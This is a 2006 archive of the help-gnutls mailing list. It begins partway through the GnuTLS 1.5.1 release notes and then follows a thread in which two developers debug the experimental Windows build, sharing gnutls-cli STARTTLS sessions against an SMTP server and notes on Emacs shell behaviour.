Fix gnutls-cli-debug regarding resume support detection. Earlier, if the session-id from the server had a length of 0, it would indicate the the server supports resumption, which isn't the case. Reported by Kataja Kai . ** Fix building of examples on FreeBSD by including netinet/in.h. Reported by Roman Bogorodskiy . ** Fix certtool bug that caused the private key to not be loaded when generating a certificate with --load-request, which in turn triggered another unrelated bug in gnutls_x509_crt_sign2 (also fixed). Reported by Sascha Ziemann . ** gnutls-cli and gnutls-serv works on Windows. The problem was the select() call that doesn't work on file descriptors (stdin) on Windows. We borrowed some code from plibc to solve this. It appears to be somewhat unreliable though. ** Autoconf 2.60 is now used. ** API and ABI modifications: No changes since last version. Improving GnuTLS is costly, but you can help! We are looking for organizations that find GnuTLS useful and wish to contribute back. You can contribute by reporting bugs, improve the software, or donate money or equipment. Commercial support contracts for GnuTLS are available, and they help finance continued maintenance. Simon Josefsson Datakonsult, a Stockholm based privately held company, is currently funding GnuTLS maintenance. We are always looking for interesting development projects. See http://josefsson.org/ for more details. All manual formats are available from: http://www.gnutls.org/manual/ Direct link to the most popular formats: http://www.gnutls.org/manual/gnutls.html - HTML format http://www.gnutls.org/manual/gnutls.pdf - PDF format http://www.gnutls.org/reference/ch01.html - API Reference, GTK-DOC HTML If you need help to use GnuTLS, or want to help others, you are invited to join our help-gnutls mailing list, see: . The project page of the library is available at: http://www.gnutls.org/ http://www.gnu.org/software/gnutls/ http://josefsson.org/gnutls/ (updated fastest) Here are the compressed sources (4.1MB): http://josefsson.org/gnutls/releases/gnutls-1.5.1.tar.bz2 ftp://ftp.gnutls.org/pub/gnutls/devel/gnutls-1.5.1.tar.bz2 Here are GPG detached signatures signed using key 0xB565716F: http://josefsson.org/gnutls/releases/gnutls-1.5.1.tar.bz2.sig ftp://ftp.gnutls.org/pub/gnutls/devel/gnutls-1.5.1.tar.bz2.sig The software is cryptographically signed by the author using an OpenPGP key identified by the following information: pub 1280R/B565716F 2002-05-05 [expires: 2007-02-15] uid Simon Josefsson uid Simon Josefsson sub 1280R/4D5D40AE 2002-05-05 [expires: 2007-02-15] sub 1024R/09CC4670 2006-03-18 [expires: 2007-04-22] sub 1024R/AABB1F7B 2006-03-18 [expires: 2007-04-22] sub 1024R/A14C401A 2006-03-18 [expires: 2007-04-22] The key is available from: http://josefsson.org/key.txt dns:b565716f.josefsson.org?TYPE=CERT Here are the SHA-1 and SHA-224 checksums: 116cdb641fe176b4f834a2709635eeeb3bf0dd73 gnutls-1.5.1.tar.bz2 ab2a7e281c288bd928dd7fc750e75ff3beb913b6 gnutls-1.5.1.tar.bz2.sig ebf5fadf425f93f04d1eddd71a0940a2d3a97455393be1cb38d92fc5 gnutls-1.5.1.tar.bz2 c5d049ab7df89053b7634285c74c9036963599caba7d6584c4abd14c gnutls-1.5.1.tar.bz2.sig Enjoy, Nikos and Simon -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 419 bytes Desc: not available URL: From jas at extundo.com Thu Sep 21 17:21:10 2006 From: jas at extundo.com (Simon Josefsson) Date: Thu, 21 Sep 2006 17:21:10 +0200 Subject: [Help-gnutls] GnuTLS 1.5.1 for Windows Message-ID: <87mz8t455l.fsf@latte.josefsson.org> Don't forget that GnuTLS is available under Windows! The Windows installer contains the library, binaries for the command line tools and all example programs. The manual, in PDF and HTML formats, together with the GTK-DOC style API reference manual in HTML, are also included. This release uses libgpg-error 1.4, libgcrypt 1.2.3, libtasn1 0.3.6, and gnutls 1.5.1. The source code for those packages, as well as the build makefile, is also included in the installer, but is not installed by default. For more information, such as an explanation how you can write programs using Visual Studio or MinGW that uses to GnuTLS, see: http://josefsson.org/gnutls4win/ I'm interested in feedback about the package, since it is quite experimental. Are you able to install it? Does it work? Can you write programs that link to the DLL? I've done some testing on Windows XP. The binary installer and PGP signature: http://josefsson.org/gnutls4win/gnutls-1.5.1.exe (14MB) http://josefsson.org/gnutls4win/gnutls-1.5.1.exe.sig Here are the SHA-1 and SHA-224 checksums: 692c9aef88a163d9ded132e5a0dfadc981b454db gnutls-1.5.1.exe 92b7c9bbde6de428ee8db22e814f7c3a60f5c894 gnutls-1.5.1.exe.sig 3dc6e4881880b2c81bd701a19667be55bef70a61a9ebae3ebd3074ea gnutls-1.5.1.exe 426c1e88183fe99395b7a20ea4e6243e0b6bdce8e478d23e520972f4 gnutls-1.5.1.exe.sig Happy hacking, Simon -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 419 bytes Desc: not available URL: From angeli at caeruleus.net Thu Sep 21 22:21:44 2006 From: angeli at caeruleus.net (Ralf Angeli) Date: Thu, 21 Sep 2006 22:21:44 +0200 Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows References: <87mz8t455l.fsf@latte.josefsson.org> Message-ID: * Simon Josefsson (2006-09-21) writes: > Don't forget that GnuTLS is available under Windows! Cool, thanks! > I'm interested in feedback about the package, since it is quite > experimental. Are you able to install it? Yes. > Does it work? I'm not sure. I get the following when executing the first line in cmd.exe. The output appears till the line starting with "220". After that it does nothing. When typing `C-c' for aborting the operation the last lines (starting with "***") appear. C:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de Resolving 'smtp.web.de'... Connecting to '217.72.192.157:25'... - Simple Client Mode: 220 smtp06.web.de ESMTP WEB.DE V4.107#114 Thu, 21 Sep 2006 22:08:51 +0200 *** Starting TLS handshake *** Fatal error: A record packet with illegal version was received. *** Handshake has failed ^C I am not able to send mail using smtpmail.el in Gnus either. I am not sure however if this is the fault of GnuTLS. The only output after aborting the operation (which will hang as well) I can see in the SMTP trace buffer (`smtpmail-debug-info' set to t) is this: 220 smtp.1und1.de (mrelayeu4) Welcome to Nemesis ESMTP server^M EHLO NEUTRINO^M QUIT^M -- Ralf From jas at extundo.com Fri Sep 22 14:56:00 2006 From: jas at extundo.com (Simon Josefsson) Date: Fri, 22 Sep 2006 14:56:00 +0200 Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows In-Reply-To: (Ralf Angeli's message of "Thu\, 21 Sep 2006 22\:21\:44 +0200") References: <87mz8t455l.fsf@latte.josefsson.org> Message-ID: <87k63w2h7j.fsf@latte.josefsson.org> Ralf Angeli writes: >> I'm interested in feedback about the package, since it is quite >> experimental. Are you able to install it? > > Yes. For the record, which Windows version and service packs are you using? >> Does it work? > > I'm not sure. I get the following when executing the first line in > cmd.exe. The output appears till the line starting with "220". After > that it does nothing. When typing `C-c' for aborting the operation > the last lines (starting with "***") appear. > > C:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de > Resolving 'smtp.web.de'... > Connecting to '217.72.192.157:25'... > > - Simple Client Mode: > > 220 smtp06.web.de ESMTP WEB.DE V4.107#114 Thu, 21 Sep 2006 22:08:51 +0200 > *** Starting TLS handshake > *** Fatal error: A record packet with illegal version was received. > *** Handshake has failed > ^C The server is waiting for you to do something: you'll need to first type: STARTTLS and wait for the server ACK that and then send a EOF to gnutls-cli that tells it to start negotiate TLS. To send an EOF, I think you press C-z RET or possibly C-d RET. However, gnutls-cli uses select() and there is a problem with select() on Windows that it doesn't support file descriptors. GnuTLS 1.5.1 has a work-around for this, but it may be unreliable. > I am not able to send mail using smtpmail.el in Gnus either. I am not > sure however if this is the fault of GnuTLS. The only output after > aborting the operation (which will hang as well) I can see in the SMTP > trace buffer (`smtpmail-debug-info' set to t) is this: > > 220 smtp.1und1.de (mrelayeu4) Welcome to Nemesis ESMTP server^M > EHLO NEUTRINO^M > QUIT^M Right, I haven't succeeded in doing that either, and there may be Emacs bugs here: process-send-eof doesn't seem to work the same way as on Linux. Let's focus on getting gnutls-cli to work in a terminal first. /Simon From angeli at caeruleus.net Sun Sep 24 18:03:05 2006 From: angeli at caeruleus.net (Ralf Angeli) Date: Sun, 24 Sep 2006 18:03:05 +0200 Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows References: <87mz8t455l.fsf@latte.josefsson.org> <87k63w2h7j.fsf@latte.josefsson.org> Message-ID: * Simon Josefsson (2006-09-22) writes: > Ralf Angeli writes: > >>> I'm interested in feedback about the package, since it is quite >>> experimental. Are you able to install it? >> >> Yes. > > For the record, which Windows version and service packs are you using? Windows XP SP2 > The server is waiting for you to do something: you'll need to first > type: > > STARTTLS > > and wait for the server ACK that and then send a EOF to gnutls-cli > that tells it to start negotiate TLS. To send an EOF, I think you > press C-z RET or possibly C-d RET. Okay, it's working with C-z in cmd.exe. (It didn't get an EOF through in a MinGW shell, however.) C:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de Resolving 'smtp.web.de'... Connecting to '217.72.192.157:25'... - Simple Client Mode: 220 smtp05.web.de ESMTP WEB.DE V4.107#114 Sun, 24 Sep 2006 17:55:43 +0200 ehlo neutrino 250-smtp05.web.de Hello neutrino [84.165.4.58] 250-SIZE 69920427 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP starttls 220 OpenSSL/0.9.7beta go ahead ^Z *** Starting TLS handshake - Certificate type: X.509 - Got a certificate list of 1 certificates. - Certificate[0] info: -----BEGIN CERTIFICATE----- MIIDZTCCAs6gAwIBAgIQIY4doat2RZ49+oHZDCyaqzANBgkqhkiG9w0BAQQFADCB [...] WfwOQxZdz7Gu -----END CERTIFICATE----- # The hostname in the certificate matches 'smtp.web.de'. # valid since: Tue Feb 15:51:50 Westeurop?ische Normalzeit 2006 # expires at: Wed Feb 15:51:50 Westeurop?ische Normalzeit 2007 # fingerprint: D1:7A:1B:CB:4E:96:CD:DC:E2:D0:39:41:D5:F7:CC:B6 # Subject's DN: C=DE,ST=Baden-Wuerttemberg,L=Karlsruhe,O=WEB.DE GmbH,CN=smtp.we b.de # Issuer's DN: C=ZA,ST=Western Cape,L=Cape Town,O=Thawte Consulting cc,OU=Certi fication Services Division,CN=Thawte Premium Server CA,EMAIL=premium-server at thaw te.com - Peer's certificate issuer is unknown - Peer's certificate is NOT trusted - Version: TLS 1.0 - Key Exchange: RSA - Cipher: AES 256 CBC - MAC: SHA - Compression: NULL 500 Unrecognized command ^C > Right, I haven't succeeded in doing that either, and there may be > Emacs bugs here: process-send-eof doesn't seem to work the same way as > on Linux. > > Let's focus on getting gnutls-cli to work in a terminal first. Okay. -- Ralf From jas at extundo.com Mon Sep 25 14:19:09 2006 From: jas at extundo.com (Simon Josefsson) Date: Mon, 25 Sep 2006 14:19:09 +0200 Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows In-Reply-To: (Ralf Angeli's message of "Sun\, 24 Sep 2006 18\:03\:05 +0200") References: <87mz8t455l.fsf@latte.josefsson.org> <87k63w2h7j.fsf@latte.josefsson.org> Message-ID: <87r6y0t9z6.fsf@latte.josefsson.org> Ralf Angeli writes: > Okay, it's working with C-z in cmd.exe. (It didn't get an EOF through > in a MinGW shell, however.) Maybe C-d works in MinGW shells? > > 500 Unrecognized command > ^C This may be because of the RET. In Unix, you can press C-d C-d, maybe that works under Windows? I.e., C-z C-z. Alternatively, maybe we should use C-c to trigger TLS negotiation... >> Right, I haven't succeeded in doing that either, and there may be >> Emacs bugs here: process-send-eof doesn't seem to work the same way as >> on Linux. >> >> Let's focus on getting gnutls-cli to work in a terminal first. > > Okay. It seems to work somewhat for you now, so the next step is to make it work in M-x shell RET in Emacs. Does this work? /Simon From angeli at caeruleus.net Mon Sep 25 19:48:54 2006 From: angeli at caeruleus.net (Ralf Angeli) Date: Mon, 25 Sep 2006 19:48:54 +0200 Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows References: <87mz8t455l.fsf@latte.josefsson.org> <87k63w2h7j.fsf@latte.josefsson.org> <87r6y0t9z6.fsf@latte.josefsson.org> Message-ID: * Simon Josefsson (2006-09-25) writes: > It seems to work somewhat for you now, so the next step is to make it > work in M-x shell RET in Emacs. Does this work? Yes: (M-x shell RET) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. c:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de gnutls-cli --print-cert --port 25 --starttls smtp.web.de Resolving 'smtp.web.de'... Connecting to '217.72.192.157:25'... - Simple Client Mode: 220 smtp05.web.de ESMTP WEB.DE V4.107#114 Mon, 25 Sep 2006 19:42:24 +0200 ehlo neutrino 250-smtp05.web.de Hello neutrino [84.165.71.252] 250-SIZE 69920427 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP starttls 220 OpenSSL/0.9.7beta go ahead *** Starting TLS handshake - Certificate type: X.509 - Got a certificate list of 1 certificates. - Certificate[0] info: -----BEGIN CERTIFICATE----- MIIDZTCCAs6gAwIBAgIQIY4doat2RZ49+oHZDCyaqzANBgkqhkiG9w0BAQQFADCB [...] WfwOQxZdz7Gu -----END CERTIFICATE----- # The hostname in the certificate matches 'smtp.web.de'. # valid since: Tue Feb 15:51:50 Westeurop\344ische Normalzeit 2007 # expires at: Wed Feb 15:51:50 Westeurop\344ische Normalzeit 2007 # fingerprint: D1:7A:1B:CB:4E:96:CD:DC:E2:D0:39:41:D5:F7:CC:B6 # Subject's DN: C=DE,ST=Baden-Wuerttemberg,L=Karlsruhe,O=WEB.DE GmbH,CN=smtp.web.de # Issuer's DN: C=ZA,ST=Western Cape,L=Cape Town,O=Thawte Consulting cc,OU=Certification Services Division,CN=Thawte Premium Server CA,EMAIL=premium-server at thawte.com - Peer's certificate issuer is unknown - Peer's certificate is NOT trusted - Version: TLS 1.0 - Key Exchange: RSA - Cipher: AES 256 CBC - MAC: SHA - Compression: NULL C-c C-c^C c:\foo> Process shell finished -- Ralf From jas at extundo.com Mon Sep 25 20:47:59 2006 From: jas at extundo.com (Simon Josefsson) Date: Mon, 25 Sep 2006 20:47:59 +0200 Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows In-Reply-To: (Ralf Angeli's message of "Mon\, 25 Sep 2006 19\:48\:54 +0200") References: <87mz8t455l.fsf@latte.josefsson.org> <87k63w2h7j.fsf@latte.josefsson.org> <87r6y0t9z6.fsf@latte.josefsson.org> Message-ID: <87bqp3iy00.fsf@latte.josefsson.org> Ralf Angeli writes: > * Simon Josefsson (2006-09-25) writes: > >> It seems to work somewhat for you now, so the next step is to make it >> work in M-x shell RET in Emacs. Does this work? > > Yes: > > (M-x shell RET) Which Emacs version is this? I've had problems reproducing this step, but I think it depends on the Windows version. How do you send the C-z to the sub-process? Can you send additional data after the TLS connection is established? After TLS is negotiated, try typing: EHLO foo and see whether it responds or not. For comparison, when I try this in Emacs 21.3 on Windows 2000, gnutls-cli receives two EOF's, so after negotiating TLS, it will abort and the command prompt is shown again. I'm not sure why this happens.. /Simon > Microsoft Windows XP [Version 5.1.2600] > (C) Copyright 1985-2001 Microsoft Corp. > > c:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de > gnutls-cli --print-cert --port 25 --starttls smtp.web.de > Resolving 'smtp.web.de'... > Connecting to '217.72.192.157:25'... > > - Simple Client Mode: > > 220 smtp05.web.de ESMTP WEB.DE V4.107#114 Mon, 25 Sep 2006 19:42:24 +0200 > ehlo neutrino > 250-smtp05.web.de Hello neutrino [84.165.71.252] > 250-SIZE 69920427 > 250-PIPELINING > 250-AUTH PLAIN LOGIN > 250-STARTTLS > 250 HELP > starttls > 220 OpenSSL/0.9.7beta go ahead > *** Starting TLS handshake > - Certificate type: X.509 > - Got a certificate list of 1 certificates. > > - Certificate[0] info: > > -----BEGIN CERTIFICATE----- > MIIDZTCCAs6gAwIBAgIQIY4doat2RZ49+oHZDCyaqzANBgkqhkiG9w0BAQQFADCB > [...] > WfwOQxZdz7Gu > -----END CERTIFICATE----- > > # The hostname in the certificate matches 'smtp.web.de'. > # valid since: Tue Feb 15:51:50 Westeurop\344ische Normalzeit 2007 > # expires at: Wed Feb 15:51:50 Westeurop\344ische Normalzeit 2007 > # fingerprint: D1:7A:1B:CB:4E:96:CD:DC:E2:D0:39:41:D5:F7:CC:B6 > # Subject's DN: C=DE,ST=Baden-Wuerttemberg,L=Karlsruhe,O=WEB.DE GmbH,CN=smtp.web.de > # Issuer's DN: C=ZA,ST=Western Cape,L=Cape Town,O=Thawte Consulting cc,OU=Certification Services Division,CN=Thawte Premium Server CA,EMAIL=premium-server at thawte.com > > > - Peer's certificate issuer is unknown > - Peer's certificate is NOT trusted > - Version: TLS 1.0 > - Key Exchange: RSA > - Cipher: AES 256 CBC > - MAC: SHA > - Compression: NULL > C-c C-c^C > c:\foo> > Process shell finished > > -- > Ralf From angeli at caeruleus.net Mon Sep 25 21:00:40 2006 From: angeli at caeruleus.net (Ralf Angeli) Date: Mon, 25 Sep 2006 21:00:40 +0200 Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows References: <87mz8t455l.fsf@latte.josefsson.org> <87k63w2h7j.fsf@latte.josefsson.org> <87r6y0t9z6.fsf@latte.josefsson.org> <87bqp3iy00.fsf@latte.josefsson.org> Message-ID: * Simon Josefsson (2006-09-25) writes: > Ralf Angeli writes: > >> * Simon Josefsson (2006-09-25) writes: >> >>> It seems to work somewhat for you now, so the next step is to make it >>> work in M-x shell RET in Emacs. Does this work? >> >> Yes: >> >> (M-x shell RET) > > Which Emacs version is this? M-x emacs-version RET GNU Emacs 22.0.50.1 (i386-mingw-nt5.1.2600) of 2006-09-14 on NEUTRINO You can download a version of CVS Emacs from June from . I'm intending to upload a newer version once pretesting starts. > I've had problems reproducing this step, > but I think it depends on the Windows version. How do you send the > C-z to the sub-process? C-d > Can you send additional data after the TLS > connection is established? After TLS is negotiated, try typing: > > EHLO foo > > and see whether it responds or not. I'm not sure if I understand correctly. Typing "EHLO foo" before typing `C-d' at least didn't work: c:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de gnutls-cli --port 25 --starttls smtp.web.de Resolving 'smtp.web.de'... Connecting to '217.72.192.157:25'... - Simple Client Mode: 220 smtp08.web.de ESMTP WEB.DE V4.107#114 Mon, 25 Sep 2006 20:55:30 +0200 ehlo neutrino 250-smtp08.web.de Hello neutrino [84.165.71.252] 250-SIZE 69920427 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP starttls 220 OpenSSL/0.9.7beta go ahead EHLO foo *** Starting TLS handshake *** Fatal error: A record packet with illegal version was received. *** Handshake has failed *** Starting TLS handshake *** Fatal error: A record packet with illegal version was received. *** Handshake has failed C-c C-c^C -- Ralf From jas at extundo.com Tue Sep 26 10:15:55 2006 From: jas at extundo.com (Simon Josefsson) Date: Tue, 26 Sep 2006 10:15:55 +0200 Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows In-Reply-To: (Ralf Angeli's message of "Mon\, 25 Sep 2006 21\:00\:40 +0200") References: <87mz8t455l.fsf@latte.josefsson.org> <87k63w2h7j.fsf@latte.josefsson.org> <87r6y0t9z6.fsf@latte.josefsson.org> <87bqp3iy00.fsf@latte.josefsson.org> Message-ID: <87u02vgi10.fsf@latte.josefsson.org> Ralf Angeli writes: >> Which Emacs version is this? > > M-x emacs-version RET > GNU Emacs 22.0.50.1 (i386-mingw-nt5.1.2600) of 2006-09-14 on NEUTRINO > > You can download a version of CVS Emacs from June from > . I'm intending to upload a > newer version once pretesting starts. Thanks, I will try that one. >> I've had problems reproducing this step, >> but I think it depends on the Windows version. How do you send the >> C-z to the sub-process? > > C-d Ok. >> Can you send additional data after the TLS >> connection is established? After TLS is negotiated, try typing: >> >> EHLO foo >> >> and see whether it responds or not. > > I'm not sure if I understand correctly. Typing "EHLO foo" before > typing `C-d' at least didn't work: No, you'll need to start gnutls-cli, wait for the server to respond ("220 smtp08...") then type: starttls wait for the server to ack the request to start TLS ("220 OpenSSL...") and then type C-d to invoke the TLS layer. Once it finishes, you are talking to the server under the encrypted layer. If you could then type: EHLO foo at that point, and show me the output, I'll know that the TLS layer actually works properly. If you get this far, I think it should be possible to get Gnus to work too. I haven't managed to run gnutls-cli in a M-x shell successfully yet, but hopefully the Emacs version you point me at will help me... /Simon > c:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de > gnutls-cli --port 25 --starttls smtp.web.de > Resolving 'smtp.web.de'... > Connecting to '217.72.192.157:25'... > > - Simple Client Mode: > > 220 smtp08.web.de ESMTP WEB.DE V4.107#114 Mon, 25 Sep 2006 20:55:30 +0200 > ehlo neutrino > 250-smtp08.web.de Hello neutrino [84.165.71.252] > 250-SIZE 69920427 > 250-PIPELINING > 250-AUTH PLAIN LOGIN > 250-STARTTLS > 250 HELP > starttls > 220 OpenSSL/0.9.7beta go ahead > EHLO foo > *** Starting TLS handshake > *** Fatal error: A record packet with illegal version was received. > *** Handshake has failed > *** Starting TLS handshake > *** Fatal error: A record packet with illegal version was received. > *** Handshake has failed > C-c C-c^C > > -- > Ralf From angeli at caeruleus.net Tue Sep 26 19:12:05 2006 From: angeli at caeruleus.net (Ralf Angeli) Date: Tue, 26 Sep 2006 19:12:05 +0200 Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows References: <87mz8t455l.fsf@latte.josefsson.org> <87k63w2h7j.fsf@latte.josefsson.org> <87r6y0t9z6.fsf@latte.josefsson.org> <87bqp3iy00.fsf@latte.josefsson.org> <87u02vgi10.fsf@latte.josefsson.org> Message-ID: * Simon Josefsson (2006-09-26) writes: > No, you'll need to start gnutls-cli, wait for the server to respond > ("220 smtp08...") then type: > > starttls > > wait for the server to ack the request to start TLS ("220 OpenSSL...") > and then type C-d to invoke the TLS layer. Once it finishes, you are > talking to the server under the encrypted layer. If you could then > type: > > EHLO foo > > at that point, and show me the output, I'll know that the TLS layer > actually works properly. Doesn't seem like it works. I get the following output. `C-d' was typed after the line with "220 OpenSSL...". After I inserted "EHLO foo " about 20 seconds passed and then the indicated error was thrown. c:\foo>gnutls-cli --port 25 --starttls smtp.web.de gnutls-cli --port 25 --starttls smtp.web.de Resolving 'smtp.web.de'... Connecting to '217.72.192.157:25'... - Simple Client Mode: 220 smtp07.web.de ESMTP WEB.DE V4.107#114 Tue, 26 Sep 2006 19:05:24 +0200 starttls 220 OpenSSL/0.9.7beta go ahead *** Starting TLS handshake - Certificate type: X.509 - Got a certificate list of 1 certificates. - Certificate[0] info: # The hostname in the certificate matches 'smtp.web.de'. # valid since: Tue Feb 15:51:50 Westeurop\344ische Normalzeit 2007 # expires at: Wed Feb 15:51:50 Westeurop\344ische Normalzeit 2007 # fingerprint: D1:7A:1B:CB:4E:96:CD:DC:E2:D0:39:41:D5:F7:CC:B6 # Subject's DN: C=DE,ST=Baden-Wuerttemberg,L=Karlsruhe,O=WEB.DE GmbH,CN=smtp.web.de # Issuer's DN: C=ZA,ST=Western Cape,L=Cape Town,O=Thawte Consulting cc,OU=Certification Services Division,CN=Thawte Premium Server CA,EMAIL=premium-server at thawte.com - Peer's certificate issuer is unknown - Peer's certificate is NOT trusted - Version: TLS 1.0 - Key Exchange: RSA - Cipher: AES 256 CBC - MAC: SHA - Compression: NULL EHLO foo *** gnutls_bye() error: A record packet with illegal version was received. c:\foo> Process shell finished -- Ralf From jas at extundo.com Wed Sep 27 10:29:46 2006 From: jas at extundo.com (Simon Josefsson) Date: Wed, 27 Sep 2006 10:29:46 +0200 Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows In-Reply-To: (Ralf Angeli's message of "Tue\, 26 Sep 2006 19\:12\:05 +0200") References: <87mz8t455l.fsf@latte.josefsson.org> <87k63w2h7j.fsf@latte.josefsson.org> <87r6y0t9z6.fsf@latte.josefsson.org> <87bqp3iy00.fsf@latte.josefsson.org> <87u02vgi10.fsf@latte.josefsson.org> Message-ID: <87r6xxlnk5.fsf@latte.josefsson.org> Ralf Angeli writes: > * Simon Josefsson (2006-09-26) writes: > >> No, you'll need to start gnutls-cli, wait for the server to respond >> ("220 smtp08...") then type: >> >> starttls >> >> wait for the server to ack the request to start TLS ("220 OpenSSL...") >> and then type C-d to invoke the TLS layer. Once it finishes, you are >> talking to the server under the encrypted layer. If you could then >> type: >> >> EHLO foo >> >> at that point, and show me the output, I'll know that the TLS layer >> actually works properly. > > Doesn't seem like it works. I get the following output. `C-d' was > typed after the line with "220 OpenSSL...". After I inserted "EHLO > foo " about 20 seconds passed and then the indicated error was > thrown. Ok. I wasn't able to reproduce everything you could, even after downloading the same Emacs. After some experimenting, it seems the select() call in gnutls-cli triggers too soon when gnutls-cli is run under Emacs. It waits for input from the user, when there is none. I think I'll add some debug messages to gnutls-cli's select() replacement, so it is possible to see if that's the cause or not. Since we get different results even with the same gnutls and emacs, it would help if you could try that version too, I'll get back with the details when I've added this debug stuff. > c:\foo>gnutls-cli --port 25 --starttls smtp.web.de > gnutls-cli --port 25 --starttls smtp.web.de > Resolving 'smtp.web.de'... > Connecting to '217.72.192.157:25'... > > - Simple Client Mode: > > 220 smtp07.web.de ESMTP WEB.DE V4.107#114 Tue, 26 Sep 2006 19:05:24 +0200 > starttls > 220 OpenSSL/0.9.7beta go ahead > *** Starting TLS handshake > - Certificate type: X.509 > - Got a certificate list of 1 certificates. > > - Certificate[0] info: > # The hostname in the certificate matches 'smtp.web.de'. > # valid since: Tue Feb 15:51:50 Westeurop\344ische Normalzeit 2007 > # expires at: Wed Feb 15:51:50 Westeurop\344ische Normalzeit 2007 > # fingerprint: D1:7A:1B:CB:4E:96:CD:DC:E2:D0:39:41:D5:F7:CC:B6 > # Subject's DN: C=DE,ST=Baden-Wuerttemberg,L=Karlsruhe,O=WEB.DE GmbH,CN=smtp.web.de > # Issuer's DN: C=ZA,ST=Western Cape,L=Cape Town,O=Thawte Consulting cc,OU=Certification Services Division,CN=Thawte Premium Server CA,EMAIL=premium-server at thawte.com > > > - Peer's certificate issuer is unknown > - Peer's certificate is NOT trusted > - Version: TLS 1.0 > - Key Exchange: RSA > - Cipher: AES 256 CBC > - MAC: SHA > - Compression: NULL > EHLO foo > *** gnutls_bye() error: A record packet with illegal version was received. > > c:\foo> > Process shell finished Interesting, I haven't seen this so far. Thanks, Simon